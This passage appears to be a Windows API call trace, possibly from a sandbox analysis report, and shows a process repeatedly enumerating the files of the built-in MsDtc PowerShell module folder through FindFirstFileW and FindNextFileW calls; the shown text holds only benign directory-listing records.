ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x843, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.Types.ps1xml", cAlternateFileName="")) returned 1 [0226.487] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcAdvancedHostSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.487] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xef8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcAdvancedSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.487] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x635, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcClusterDefaultTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.487] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3ae0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcClusterTMMappingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.487] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x60f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcDefaultTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.488] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe44, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcLogTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.488] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x154d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcNetworkSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.488] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x11ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.488] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsStatisticsTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.488] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa84, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsTraceSessionTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.489] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaa4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsTraceSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.489] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1766, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.489] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6701, dwReserved0=0x0, dwReserved1=0x0, cFileName="TestDtc.psm1", cAlternateFileName="")) returned 1 [0226.489] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6701, dwReserved0=0x0, dwReserved1=0x0, cFileName="TestDtc.psm1", cAlternateFileName="")) returned 0 [0226.489] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.489] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.490] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", lpFilePart=0x0) returned 0x38 [0226.490] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\", lpFilePart=0x0) returned 0x39 [0226.490] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.490] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.491] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0226.491] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.491] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1961, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.Formats.ps1xml", cAlternateFileName="")) returned 1 [0226.492] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1006, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.psd1", cAlternateFileName="")) returned 1 [0226.492] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x843, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.Types.ps1xml", cAlternateFileName="")) returned 1 [0226.492] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcAdvancedHostSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.492] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xef8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcAdvancedSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.493] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x635, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcClusterDefaultTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.493] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3ae0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcClusterTMMappingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.493] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x60f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcDefaultTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.493] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe44, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcLogTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.494] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x154d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcNetworkSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.494] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x11ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.494] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsStatisticsTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.495] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa84, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsTraceSessionTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.495] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaa4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsTraceSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.495] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1766, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.495] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6701, dwReserved0=0x0, dwReserved1=0x0, cFileName="TestDtc.psm1", cAlternateFileName="")) returned 1 [0226.498] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.498] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.499] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf850 [0226.500] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.500] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0226.501] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.501] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1961, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.Formats.ps1xml", cAlternateFileName="")) returned 1 [0226.501] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1006, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.psd1", cAlternateFileName="")) returned 1 [0226.501] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x843, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.Types.ps1xml", cAlternateFileName="")) returned 1 [0226.502] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, 